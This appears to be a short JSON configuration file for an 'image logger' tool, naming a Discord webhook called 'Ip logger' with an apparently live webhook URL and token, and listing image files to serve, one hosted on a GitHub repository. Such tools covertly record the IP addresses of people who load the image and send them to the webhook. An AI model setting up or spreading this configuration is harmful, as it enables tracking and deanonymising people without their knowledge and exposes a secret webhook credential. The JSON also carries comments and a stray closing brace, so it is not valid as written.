{
  "webhooks": [
    {
      "name": "Ip logger",
      "url": "https://discord.com/api/webhooks/1436178232855761060/U_YGZWmaW2qm_NDQiYnnmPkRyE8m0mj9n7pkTZDPddQcCI7pPJX6U4YKlAox5gTJSiua"
    }
  ],
  "image": [
    {
      "name": "NAME OF IMAGE",
      "path": "https://raw.githubusercontent.com/d3nym3/image-logger/refs/heads/main/src/assets/download%20(1).jpg" // src/assets/IMAGE_NAME.png
    },
    {
      "name": "NAME OF IMAGE",
      "path": "URL OF IMAGE or PATH OF IMAGE" // src/assets/IMAGE_NAME.png
    }
  ]
    }
